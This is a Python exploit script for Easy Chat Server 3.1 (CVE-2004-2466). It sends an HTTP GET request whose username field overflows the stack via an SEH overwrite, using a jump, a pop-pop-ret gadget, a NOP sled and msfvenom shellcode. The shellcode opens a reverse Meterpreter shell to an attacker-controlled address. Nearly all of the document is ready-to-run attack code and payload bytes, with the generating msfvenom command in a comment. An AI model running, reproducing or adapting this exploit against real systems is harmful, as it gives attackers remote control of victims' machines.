# Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
# Exploit Author: r00tpgp @ http://www.r00tpgp.com
# Usage: python easychat-exploit.py <victim-ip> <port>
# Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990
# CVE: CVE-2004-2466
# Installer: http://www.echatserver.com/
# Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000)
#!/usr/bin/python
import sys, socket, time
host = sys.argv[1] # Recieve IP from user
port = int(sys.argv[2]) # Recieve Port from user
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f python -b "\x00\x20"
buf = ""
buf += "\xbe\x4e\xdd\xd4\x27\xd9\xe9\xd9\x74\x24\xf4\x5b\x29"
buf += "\xc9\xb1\x54\x31\x73\x13\x83\xc3\x04\x03\x73\x41\x3f"
buf += "\x21\xdb\xb5\x3d\xca\x24\x45\x22\x42\xc1\x74\x62\x30"
buf += "\x81\x26\x52\x32\xc7\xca\x19\x16\xfc\x59\x6f\xbf\xf3"
buf += "\xea\xda\x99\x3a\xeb\x77\xd9\x5d\x6f\x8a\x0e\xbe\x4e"
buf += "\x45\x43\xbf\x97\xb8\xae\xed\x40\xb6\x1d\x02\xe5\x82"
buf += "\x9d\xa9\xb5\x03\xa6\x4e\x0d\x25\x87\xc0\x06\x7c\x07"
buf += "\xe2\xcb\xf4\x0e\xfc\x08\x30\xd8\x77\xfa\xce\xdb\x51"
buf += "\x33\x2e\x77\x9c\xfc\xdd\x89\xd8\x3a\x3e\xfc\x10\x39"
buf += "\xc3\x07\xe7\x40\x1f\x8d\xfc\xe2\xd4\x35\xd9\x13\x38"
buf += "\xa3\xaa\x1f\xf5\xa7\xf5\x03\x08\x6b\x8e\x3f\x81\x8a"
buf += "\x41\xb6\xd1\xa8\x45\x93\x82\xd1\xdc\x79\x64\xed\x3f"
buf += "\x22\xd9\x4b\x4b\xce\x0e\xe6\x16\x86\xe3\xcb\xa8\x56"
buf += "\x6c\x5b\xda\x64\x33\xf7\x74\xc4\xbc\xd1\x83\x2b\x97"
buf += "\xa6\x1c\xd2\x18\xd7\x35\x10\x4c\x87\x2d\xb1\xed\x4c"
buf += "\xae\x3e\x38\xf8\xa4\xa8\x03\x55\xb8\x8a\xec\xa4\xb9"
buf += "\xcd\x2a\x21\x5f\x81\xe2\x62\xf0\x61\x53\xc3\xa0\x09"
buf += "\xb9\xcc\x9f\x29\xc2\x06\x88\xc3\x2d\xff\xe0\x7b\xd7"
buf += "\x5a\x7a\x1a\x18\x71\x06\x1c\x92\x70\xf6\xd2\x53\xf0"
buf += "\xe4\x02\x02\xfa\xf4\xd2\xaf\xfa\x9e\xd6\x79\xac\x36"
buf += "\xd4\x5c\x9a\x98\x27\x8b\x98\xdf\xd7\x4a\xa9\x94\xe1"
buf += "\xd8\x95\xc2\x0d\x0d\x16\x13\x5b\x47\x16\x7b\x3b\x33"
buf += "\x45\x9e\x44\xee\xf9\x33\xd0\x11\xa8\xe0\x73\x7a\x56"
buf += "\xde\xb3\x25\xa9\x35\xc0\x22\x55\xcb\xe4\x8a\x3e\x33"
buf += "\xa8\x2a\xbf\x59\x28\x7b\xd7\x96\x07\x74\x17\x56\x82"
buf += "\xdd\x3f\xdd\x42\xaf\xde\xe2\x4f\x71\x7f\xe2\x63\xaa"
buf += "\x96\x6d\x84\x4d\x97\x8f\xb9\x9b\xae\xe5\xfa\x1f\x95"
buf += "\xf6\xb1\x02\xbc\x9c\xb9\x11\xbe\xb4"
junk = "A"*217
nseh = "\xeb\x06\x90\x90" # short jump 6 bytes
seh = "\x86\xae\x01\x10" # pop pop ret 1001AE86 SSLEAY32.DLL
nops = "\x90"*16
header = (
"GET /chat.ghp?username=" + junk + nseh + seh + nops + buf + "&password=&room=1&sex=1 HTTP/1.1\r\n"
"User-Agent: Mozilla/4.0\r\n"
"Host: 192.168.1.136:80\r\n"
"Accept-Language: en-us\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: http://192.168.1.136\r\n"
"Connection: Keep-Alive\r\n\r\n"
)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP socket
client.connect((host, port)) # Connect to user supplied port and IP address
client.send(header) # Send the user command with a variable length name
client.close() # Close the Connection